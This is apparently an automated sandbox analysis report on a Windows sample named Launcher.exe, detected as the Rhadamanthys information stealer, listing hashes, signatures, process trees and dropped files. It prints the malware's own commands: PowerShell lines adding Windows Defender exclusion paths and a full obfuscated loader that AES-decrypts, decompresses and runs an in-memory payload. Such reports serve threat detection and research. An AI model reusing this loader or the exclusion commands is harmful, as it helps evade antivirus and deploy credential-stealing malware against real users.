Analysis
-
max time kernel
67s -
max time network
59s -
platform
windows7_x64 -
resource
win7-20230824-en -
resource tags
arch:x64arch:x86image:win7-20230824-enlocale:en-usos:windows7-x64system -
submitted
27-08-2023 22:36
Static task
static1
Behavioral task
behavioral1
Sample
Launcher.exe
Resource
win7-20230824-en
Behavioral task
behavioral2
Sample
Launcher.exe
Resource
win10-20230703-en
General
-
Target
Launcher.exe
-
Size
148.9MB
-
MD5
0413f927661212f44a19475d7110e97d
-
SHA1
3f4431b1e32995777a7d234a2e7604674d7763e0
-
SHA256
8df009feace560a1ad2466d60cb90b5be793021b2fbb5af90a13645a137e317e
-
SHA512
15e94706d36e419adefe51be8566d41e945d30e8fc89dbcc19d67da9efe823665b54064a8a246d8a61c5bf8760d196f00f46fe11f04c5e9992f9e8ac5cb89035
-
SSDEEP
786432:A5N1mgE/WgDe6UmdCvF4N3RtI9n1gqBf8IC3ZNXDPWsUwZnb5xFTtLwSTRpf4P1d:qSgU/UmamUyqt8yctjdqSjR2
Malware Config
Signatures
-
Detect rhadamanthys stealer shellcode 2 IoCs
resource yara_rule behavioral1/memory/1108-272-0x0000000002090000-0x0000000002490000-memory.dmp family_rhadamanthys behavioral1/memory/1108-274-0x0000000002090000-0x0000000002490000-memory.dmp family_rhadamanthys -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Executes dropped EXE 2 IoCs
pid Process 1636 White.bat.exe 1336 Update.exe -
Loads dropped DLL 4 IoCs
pid Process 1600 Launcher.exe 1600 Launcher.exe 1600 Launcher.exe 1152 cmd.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1336 set thread context of 1108 1336 Update.exe 39 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 1724 powershell.exe 1636 White.bat.exe 368 powershell.exe 1336 Update.exe 1336 Update.exe 1108 aspnet_compiler.exe 1108 aspnet_compiler.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 1600 Launcher.exe Token: SeDebugPrivilege 1724 powershell.exe Token: SeDebugPrivilege 1636 White.bat.exe Token: SeDebugPrivilege 368 powershell.exe Token: SeDebugPrivilege 1336 Update.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 1600 wrote to memory of 1724 1600 Launcher.exe 30 PID 1600 wrote to memory of 1724 1600 Launcher.exe 30 PID 1600 wrote to memory of 1724 1600 Launcher.exe 30 PID 1600 wrote to memory of 1152 1600 Launcher.exe 32 PID 1600 wrote to memory of 1152 1600 Launcher.exe 32 PID 1600 wrote to memory of 1152 1600 Launcher.exe 32 PID 1152 wrote to memory of 1636 1152 cmd.exe 34 PID 1152 wrote to memory of 1636 1152 cmd.exe 34 PID 1152 wrote to memory of 1636 1152 cmd.exe 34 PID 1600 wrote to memory of 368 1600 Launcher.exe 35 PID 1600 wrote to memory of 368 1600 Launcher.exe 35 PID 1600 wrote to memory of 368 1600 Launcher.exe 35 PID 1600 wrote to memory of 1336 1600 Launcher.exe 37 PID 1600 wrote to memory of 1336 1600 Launcher.exe 37 PID 1600 wrote to memory of 1336 1600 Launcher.exe 37 PID 1600 wrote to memory of 1336 1600 Launcher.exe 37 PID 1600 wrote to memory of 1336 1600 Launcher.exe 37 PID 1600 wrote to memory of 1336 1600 Launcher.exe 37 PID 1600 wrote to memory of 1336 1600 Launcher.exe 37 PID 1336 wrote to memory of 2616 1336 Update.exe 38 PID 1336 wrote to memory of 2616 1336 Update.exe 38 PID 1336 wrote to memory of 2616 1336 Update.exe 38 PID 1336 wrote to memory of 2616 1336 Update.exe 38 PID 1336 wrote to memory of 1108 1336 Update.exe 39 PID 1336 wrote to memory of 1108 1336 Update.exe 39 PID 1336 wrote to memory of 1108 1336 Update.exe 39 PID 1336 wrote to memory of 1108 1336 Update.exe 39 PID 1336 wrote to memory of 1108 1336 Update.exe 39 PID 1336 wrote to memory of 1108 1336 Update.exe 39 PID 1336 wrote to memory of 1108 1336 Update.exe 39 PID 1336 wrote to memory of 1108 1336 Update.exe 39 PID 1336 wrote to memory of 1108 1336 Update.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\Launcher.exe"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1600 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\TempFolder2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1724
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\TempFolder\White.bat""2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Users\Admin\AppData\Roaming\TempFolder\White.bat.exe"White.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_BEfTf = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\TempFolder\White.bat').Split([Environment]::NewLine);foreach ($_CASH_cSMGB in $_CASH_BEfTf) { if ($_CASH_cSMGB.StartsWith(':: @')) { $_CASH_tiCLs = $_CASH_cSMGB.Substring(4); break; }; };$_CASH_tiCLs = [System.Text.RegularExpressions.Regex]::Replace($_CASH_tiCLs, '_CASH_', '');$_CASH_YOQbw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_tiCLs);$_CASH_IiqDP = New-Object System.Security.Cryptography.AesManaged;$_CASH_IiqDP.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_IiqDP.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_IiqDP.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZGLYQpXzqZGio1AM3RKuGPD761wgVPaj/0ACagm3x4Q=');$_CASH_IiqDP.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8fyzMDu1kB6HN1zdS5E5ew==');$_CASH_dmOzy = $_CASH_IiqDP.CreateDecryptor();$_CASH_YOQbw = $_CASH_dmOzy.TransformFinalBlock($_CASH_YOQbw, 0, $_CASH_YOQbw.Length);$_CASH_dmOzy.Dispose();$_CASH_IiqDP.Dispose();$_CASH_LIOIB = New-Object System.IO.MemoryStream(, $_CASH_YOQbw);$_CASH_Fjwxu = New-Object System.IO.MemoryStream;$_CASH_XnHig = New-Object System.IO.Compression.GZipStream($_CASH_LIOIB, [IO.Compression.CompressionMode]::Decompress);$_CASH_XnHig.CopyTo($_CASH_Fjwxu);$_CASH_XnHig.Dispose();$_CASH_LIOIB.Dispose();$_CASH_Fjwxu.Dispose();$_CASH_YOQbw = $_CASH_Fjwxu.ToArray();$_CASH_gCWCr = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_YOQbw);$_CASH_mvcbk = $_CASH_gCWCr.EntryPoint;$_CASH_mvcbk.Invoke($null, (, [string[]] ('')))3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1636
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:368
-
-
C:\Users\Admin\AppData\Roaming\TempFolder\Update.exe"C:\Users\Admin\AppData\Roaming\TempFolder\Update.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1336 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵PID:2616
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1108
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5afcd2e852f87958dcd9e74a77fa318e6
SHA1f0a01c05f6622d9bd3c31c9d37e05f3907db2c8c
SHA2560ec15707cdcc5f358661dc270d635ee11c34b504774436e9e6bf914036efa3a4
SHA512bb67df8f331f6443a2acc4f445f1eb19170967e590726a483ea74de2fbe2241d2472bd8994025d19157c2ea21b1afd3a105bade9a2179696dd391ebb56c616b2
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FX5SHJ6KF0WV4Z0K0DZK.temp
Filesize7KB
MD5afcd2e852f87958dcd9e74a77fa318e6
SHA1f0a01c05f6622d9bd3c31c9d37e05f3907db2c8c
SHA2560ec15707cdcc5f358661dc270d635ee11c34b504774436e9e6bf914036efa3a4
SHA512bb67df8f331f6443a2acc4f445f1eb19170967e590726a483ea74de2fbe2241d2472bd8994025d19157c2ea21b1afd3a105bade9a2179696dd391ebb56c616b2
-
Filesize
2.4MB
MD5da1cf6c6c6f50406a80ff3cdf53beacd
SHA1c9423fa181939e03fa3aae5195af851362d4878b
SHA2569818c797d7bf79af7bd4aa92887a90105e6bd8ff1a02560d27f90bea78d9e9b5
SHA5128591a164cd9199d398c820ee8b802b057fab4aa08833c46466a1656fe04516220e40dfac6d98d8b6f8ded7b90064d4fa7614f8dc0755cbfd3ac7f39c546eeefc
-
Filesize
2.4MB
MD5da1cf6c6c6f50406a80ff3cdf53beacd
SHA1c9423fa181939e03fa3aae5195af851362d4878b
SHA2569818c797d7bf79af7bd4aa92887a90105e6bd8ff1a02560d27f90bea78d9e9b5
SHA5128591a164cd9199d398c820ee8b802b057fab4aa08833c46466a1656fe04516220e40dfac6d98d8b6f8ded7b90064d4fa7614f8dc0755cbfd3ac7f39c546eeefc
-
Filesize
449KB
MD5b06355cf59db16e77fa973f744f15cd0
SHA162ab10cdc8694d62c2347214ae32ecab473559db
SHA25650d8918d86e0d6643ce087d1820060f9839be808692d6eb0085ab0806e9a7beb
SHA512e1fdfa1f4da423c9f4e5b700dc4fa1815cefe8701629130e2bc19b75b30c27bedb1832edc9f64e809538a59cfa4256f5f5dfb220eb81e4a1cc371c0872939fc3
-
Filesize
449KB
MD5b06355cf59db16e77fa973f744f15cd0
SHA162ab10cdc8694d62c2347214ae32ecab473559db
SHA25650d8918d86e0d6643ce087d1820060f9839be808692d6eb0085ab0806e9a7beb
SHA512e1fdfa1f4da423c9f4e5b700dc4fa1815cefe8701629130e2bc19b75b30c27bedb1832edc9f64e809538a59cfa4256f5f5dfb220eb81e4a1cc371c0872939fc3
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
\Users\Admin\AppData\Local\Temp\.net\Launcher\BzgCgbfZ7GWrOkrapwDvBXaeXpeaAAE=\D3DCompiler_47_cor3.dll
Filesize4.7MB
MD52191e768cc2e19009dad20dc999135a3
SHA1f49a46ba0e954e657aaed1c9019a53d194272b6a
SHA2567353f25dc5cf84d09894e3e0461cef0e56799adbc617fce37620ca67240b547d
SHA5125adcb00162f284c16ec78016d301fc11559dd0a781ffbeff822db22efbed168b11d7e5586ea82388e9503b0c7d3740cf2a08e243877f5319202491c8a641c970
-
\Users\Admin\AppData\Local\Temp\.net\Launcher\BzgCgbfZ7GWrOkrapwDvBXaeXpeaAAE=\PresentationNative_cor3.dll
Filesize1.2MB
MD5c7bcc68b81e965fe74ef58d503c58deb
SHA199990f204f7318eeb8de6f9664ebcd0d42ea81b7
SHA25606cb4da78f5cfddece86329241a2af9d6390ce1082b02f7db2e3bf320215a23e
SHA512cab2bc27eca0ee097324a2471c8228f1723cfef5df9971359eec7710082c122b26a7aa1d1e6faab75389438a358bbff2973ad67e8dd9046455b4c4ac880d858c
-
Filesize
1.9MB
MD51b01746fe61beb761a643050823190b0
SHA1927b12e4a733bcc51545c6a005838a24b8dc4dda
SHA256f8c4d6eb1cfa9c5b6fb322a0c818a4f5d5ee44043c259e0262c0460513953fb8
SHA51283eeb187e554588a5a4efbce0fcb7e9c30e718ec9f6d797a7add28036e3d4506cd3e78386522467d7ac967a60ac509a23edd79a1b9032a7e230d980b9f36080a
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d